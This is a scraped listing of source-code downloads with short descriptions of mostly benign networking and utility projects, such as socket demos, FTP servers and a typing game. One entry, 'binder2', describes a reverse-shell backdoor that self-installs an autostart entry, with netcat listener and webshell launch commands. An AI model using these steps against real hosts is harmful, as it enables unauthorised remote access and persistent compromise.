搜索资源列表
vc的5个源码
- 打字游戏:于娱乐中练习指法 vc 超酷时钟:具有整点报时等功能,界面超酷的桌面时钟 vc 阴阳日历:不仅有阳历更有阴历查询的功能 vc 桌面留言:vc 串口类:c#-typing game : in entertainment practice fingering vc cool clock : The whole point timekeeping functions, interface cool desktop calendar clock vc yin and yang : not on
binder2
- 简介: 在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用. 用法: 1. 在本地机器监听一个端口: netcat -vv -l -p 80 2. 通过webShell或是别的什么运行后门: binder2 80 youIPadd 3. 本地监听端口将截获一个来自远程主机的cmd. 注意: 程序本身会创建一个自启动方法, 如果没有参
StWinSocket
- 用Visual C++ 编写的点对点的通讯演示程序,有客户端和服务端通讯演示,希望他有用-prepared using Visual C of the point-to-point communications demonstration program, the client and server communications demonstration. He hopes useful
rasdialx
- DameWare DBtnMap ActiveX component is a 32-bit custom control for use with Visual Basic, Visual C++ and Web pages or any environment that can host ActiveX controls. DBtnMap will allow any picture file (.JPG, .GIF, .BMP, TIFF, etc.) type supported, to
CoolSo
- 主要功能:网络越来越普及了,网络上的信息也越来越多,当你想了解一样东西时,你肯定会上搜索引擎网 站。这时候你就会重复的键入一个个\"KeyWord\",虽然Ctrl+c,ctrl+v会加快你的速度:)但仍显得很罗嗦, CoolSo就这样产生了,当你在浏览网页时,遇到想要了解的关键字时,你只要将其选中,松开鼠标的时候, CoolSo就会自动弹出来,这时你只要点一下“搜索”按扭,CoolSo就会在指定站点对你选中的关键字进行搜 索。你也可以改变默认用于搜索的站点,目前支持的搜索站点如下 百度 G
Web在线文件管理器V1.4最新版
- To use the application, unzip the FTP.zip file and place the files in c:\\inetpub\\wwwroot\\FTP. Then go into IIS management and create a new virtual directory called FTP and point it to the c:\\inetpub\\wwwroot\\FTP folder. Accept the default permis
ortp.rar
- 最新的rtp/rtcp库,纯c写的,也有c++应用例子,我跑过的,不错,写的很好,想学习rtp的来看看吧,The latest rtp/rtcp Treasury, pure c written, there are c++ Application examples, I ran in, yes, write a good, want to learn the point of view and see rtp
code.rar
- linux下的FTP服务器,使用C开发,GCC编译;实现文件的上传、下载、断点续传;技术点:守候进程、进程间通讯、管道、soket编程、文件I/O标准库函数与系统调用、文件权限管理,FTP server under linux, using the C Development, GCC compiler file upload, download, HTTP technical point: waiting for the process of inter-process communica
S60_Platform_Access_Points_Example_with_Roaming_Su
- 基于carbide.c++开发的进行IAP(internet access point)的建立和连接测试。可以运行环境:symbian os 9.2&9.3。-Carbide.c++ development based on the conduct of IAP (internet access point) the establishment and connectivity test. Can run the environment: symbian os 9.2 & 9.3.
sfjs
- 为 了提高用户身份认证和授权管理的灵活性,从We b 应用系统的安全性角度出发,讨论了 一 种在. N E T F r a me w o r k下保证应用程序安全性的身份验证和授权模型,并给出了模型的具体实现方法。 该模型利用 F o r ms身份验证方法对用户的身份进行鉴别。在授权处理上,模型结合统一资源定位( u . J f o r m R e s o u r c e L o c a t o r , U R L ) 授权模式和用户所具有的系统角色,分别从页面级和页面操作
UDPSender
- 用C语言格式写的一个基于UDP的数据传输模块,简单易用,仅需要先调用openUDPSender,指向IP与端口,然后便可以发送数据了,最后再调用closeUDPSender结束。-C language format used to write a UDP-based data transmission modules, easy to use, just have to call openUDPSender, point to IP and port, and then will be able
test_onlyread
- java界面运行在pc上,write.c载到linux系统的节点上,两者通过串口进行通信。然后在pc上运行test,在界面中输入ttyUSB0,点open按钮,然后点read按钮。接着在节点上./write运行write就能在界面上显示接收到信息。-java interface running on the pc , write.c set to the linux system nodes, which communicate through the serial port with pc.
Socket_P2P_vc
- socket 点对点编程的c++和c#完美版,服务端客户端皆有。-point-to-point socket programming c++ and c# a perfect version of both client-side service.
MyQQ
- QQ聊天程序,只要通过Ip地址,即可向别人发送消息,接收消息-ppWizard has created this MyQQ application for you. This application not only demonstrates the basics of using the Microsoft Foundation classes but is also a starting point for writing your application. This f
tcpIpDump
- // help me complete this code at this point //Use the software called wireshark and capture a few packets from the live network and save the filename as abc //Download the netdump.c source code and modify the program to display only TCP/IP pa
HttpGet
- 一个HTTP网页获取程序,使用C语言编程。 可作为学习网络编程的起点和其它网络程序的样板。-An HTTP web page access program, use the C programming language. Can be used as a starting point for learning network programming and other network program model.
winsocket(C)
- 毕业设计中用到的很好的参考资料,当然如果你实在是懒,可以稍微改改就能当自己的毕业设计了,winsocket局域网文件传输系统源代码+项目论文。主要是利用tcp进行文件传输,突出点在于将客户端与server整合成了一个程序,而且是属于控制台程序,操作简单,阅读源码当然也更清晰。够厚道了吧,管理员速度加分-Graduation well used in reference, of course, if you are really lazy, you can change a little chan
SERVERClient
- 服务器端与客户端的基本通信,C# Socket网络编程。很适合初学的学习。包括客户点与服务器端源程序以及源代码. -Server side and client-side basic communication, C# Socket Network Programming. Very suitable for beginners to learn. Including client and server-side source and point source.
Ucatalk
- 即时通讯软件,基于c/s及点对点的开发软件-Instant messaging software, based on the c/s and point-development software
how-to-use-C-toSpider
- 蜘蛛是一种半自动的程序,就象现实当中的蜘蛛在它的Web(蜘蛛网)上旅行一样,蜘蛛程序也按照类似的方式在Web链接织成的网上旅行。蜘蛛程序之所以是半自动的,是因为它总是需要一个初始链接(出发点),但此后的运行情况就要由它自己决定了,蜘蛛程序会扫描起始页面包含的链接,然后访问这些链接指向的页面,再分析和追踪那些页面包含的链接。从理论上看,最终蜘蛛程序会访问到Internet上的每一个页面,因为Internet上几乎每一个页面总是被其他或多或少的页面引用。-Spider is a semi-au
